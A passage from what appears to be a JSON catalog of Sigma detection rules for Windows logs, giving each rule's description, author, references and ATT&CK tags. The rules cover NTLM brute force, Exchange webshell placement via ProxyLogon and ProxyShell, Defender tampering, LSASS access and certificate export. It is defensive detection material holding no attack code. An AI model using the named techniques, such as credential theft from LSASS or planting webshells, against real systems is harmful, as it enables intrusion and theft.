"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" ], "tags": [ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "value": "NTLM Brute Force" }, { "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-08", "falsepositive": [ "Legacy hosts" ], "filename": "win_susp_ntlm_auth.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/1004895028995477505", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" ], "tags": [ "attack.lateral-movement", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", "value": "NTLM Logon" }, { "description": "Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" ], "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "value": "Scheduled Task Executed Uncommon LOLBIN" }, { "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities\n", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Unknown" ], "filename": "win_taskscheduler_susp_schtasks_delete.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "value": "Important Scheduled Task Deleted" }, { "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "win_taskscheduler_execution_from_susp_locations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", "value": "Scheduled Task Executed From A Suspicious Location" }, { "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", "meta": { "author": "Jose Rodriguez @Cyb3rPandaH", "creation_date": "2021-03-15", "falsepositive": [ "Unknown" ], "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/OTR_Community/status/1371053369071132675", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", "value": "Exchange Set OabVirtualDirectory ExternalUrl Property" }, { "description": "Detects the Installation of a Exchange Transport Agent", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "filename": "win_exchange_transportagent.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" ], "tags": [ "attack.persistence", "attack.t1505.002" ] }, "related": [ { "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "value": "MSExchange Transport Agent Installation - Builtin" }, { "description": "Detects a failed installation of a Exchange Transport Agent", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "filename": "win_exchange_transportagent_failed.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" ], "tags": [ "attack.persistence", "attack.t1505.002" ] }, "related": [ { "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "value": "Failed MSExchange Transport Agent Installation" }, { "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", "meta": { "author": "Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unlikely" ], "filename": "win_exchange_proxyshell_mailbox_export.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", "value": "Mailbox Export to Exchange Webserver" }, { "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-27", "falsepositive": [ "Unknown" ], "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "value": "Remove Exported Mailbox from Exchange Webserver" }, { "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unlikely" ], "filename": "win_exchange_proxylogon_oabvirtualdir.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" ], "tags": [ "attack.t1587.001", "attack.resource-development" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "value": "ProxyLogon MSExchange OabVirtualDirectory" }, { "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unlikely" ], "filename": "win_exchange_proxyshell_certificate_generation.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/GossiTheDog/status/1429175908905127938", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", "value": "Certificate Request Export to Exchange Webserver" }, { "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "filename": "win_hybridconnectionmgr_svc_running.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" ], "tags": [ "attack.persistence", "attack.t1554" ] }, "related": [ { "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", "value": "HybridConnectionManager Service Running" }, { "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unknown" ], "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "value": "Unsigned Binary Loaded From Suspicious Location" }, { "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-08-02", "falsepositive": [ "Unknown" ], "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "value": "Microsoft Defender Blocked from Loading Unsigned DLL" }, { "description": "Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-13", "falsepositive": [ "Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed" ], "filename": "win_certificateservicesclient_lifecycle_system_cert_exported.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml" ], "tags": [ "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58c0bff0-40a0-46e8-b5e8-b734b84d2017", "value": "Certificate Exported From Local Certificate Store" }, { "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", "meta": { "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "creation_date": "2021-06-30", "falsepositive": [ "Account fallback reasons (after failed login with specific account)" ], "filename": "win_smbclient_security_susp_failed_guest_logon.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare", "https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/", "https://twitter.com/KevTheHermit/status/1410203844064301056", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml" ], "tags": [ "attack.credential-access", "attack.t1110.001" ] }, "related": [ { "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", "value": "Suspicious Rejected SMB Guest Logon From IP" }, { "description": "Detects actions taken by Windows Defender malware detection engines", "meta": { "author": "Ján Trenčanský", "creation_date": "2020-07-28", "falsepositive": [ "Unlikely" ], "filename": "win_defender_threat.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", "value": "Windows Defender Threat Detected" }, { "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", "meta": { "author": "Bhabesh Raj, Nasreddine Bencherchali", "creation_date": "2021-07-05", "falsepositive": [ "Administrator might try to disable defender features during testing (must be investigated)" ], "filename": "win_defender_tamper_protection_trigger.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", "value": "Microsoft Defender Tamper Protection Trigger" }, { "description": "Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a \"medium\" level if this occurs too many times in your environment\n", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Administrator actions (should be investigated)", "Seen being triggered occasionally during Windows 8 Defender Updates" ], "filename": "win_defender_real_time_protection_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b28e58e4-2a72-4fae-bdee-0fbe904db642", "value": "Windows Defender Real-time Protection Disabled" }, { "description": "Detects blocking of process creations originating from PSExec and WMI commands", "meta": { "author": "Bhabesh Raj", "creation_date": "2020-07-14", "falsepositive": [ "Unknown" ], "filename": "win_defender_asr_psexec_wmi.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/duff22b/status/1280166329660497920", "https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1047", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "value": "PSExec and WMI Process Creations Block" }, { "description": "Detects when someone is adding or removing applications or folders from exploit guard \"ProtectedFolders\" or \"AllowedApplications\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Unlikely" ], "filename": "win_defender_config_change_exploit_guard_tamper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "value": "Windows Defender Exploit Guard Tamper" }, { "description": "Detects Access to LSASS Process", "meta": { "author": "Markus Neis", "creation_date": "2018-08-26", "falsepositive": [ "Google Chrome GoogleUpdate.exe", "Some Taskmgr.exe related activity" ], "filename": "win_defender_asr_lsass_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "value": "LSASS Access Detected via Attack Surface Reduction" }, { "description": "Detects disabling of the Windows Defender virus scanning feature", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Unknown" ], "filename": "win_defender_virus_scan_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "686c0b4b-9dd3-4847-9077-d6c1bbe36fcb", "value": "Windows Defender Virus Scanning Feature Disabled" }, { "description": "Windows Defender logs when the history of detected infections is deleted.", "meta": { "author": "Cian Heasley", "creation_date": "2020-08-13", "falsepositive": [ "Deletion of Defender malware detections history for legitimate reasons" ], "filename": "win_defender_history_delete.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", "value": "Windows Defender Malware Detection History Deletion" }, { "description": "Detects the Setting of Windows Defender Exclusions", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-07-06", "falsepositive": [ "Administrator actions" ], "filename": "win_defender_config_change_exclusion_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/_nullbind/status/1204923340810543109", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", "value": "Windows Defender Exclusions Added" }, { "description": "Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Unknown" ], "filename": "win_defender_malware_and_pua_scan_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bc275be9-0bec-4d77-8c8f-281a2df6710f", "value": "Windows Defender Malware And PUA Scanning Disabled" }, { "description": "Detects the restoration of files from the defender quarantine", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-06", "falsepositive": [ "Legitimate administrator activity restoring a file" ], "filename": "win_defender_restored_quarantine_file.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "value": "Win Defender Restored Quarantine File" }, { "description": "Detects triggering of AMSI by Windows Defender.", "meta": { "author": "Bhabesh Raj", "creation_date": "2020-09-14", "falsepositive": [ "Unlikely" ], "filename": "win_defender_malware_detected_amsi_source.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", "value": "Windows Defender AMSI Trigger Detected" }, { "description": "Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.\n", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Unknown" ], "filename": "win_defender_antimalware_platform_expired.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "360a1340-398a-46b6-8d06-99b905dc69d2", "value": "Windows Defender Grace Period Expired" }, { "description": "Detects issues with Windows Defender Real-Time Protection features", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)", "creation_date": "2023-03-28", "falsepositive": [ "Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required" ], "filename": "win_defender_real_time_protection_errors.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346", "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd80db93-6ec2-4f4c-a017-ad40da6ffe81", "value": "Windows Defender Real-Time Protection Failure/Restart" }, { "description": "Detects suspicious changes to the Windows Defender configuration", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-06", "falsepositive": [ "Administrator activity (must be investigated)" ], "filename": "win_defender_suspicious_features_tampering.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": 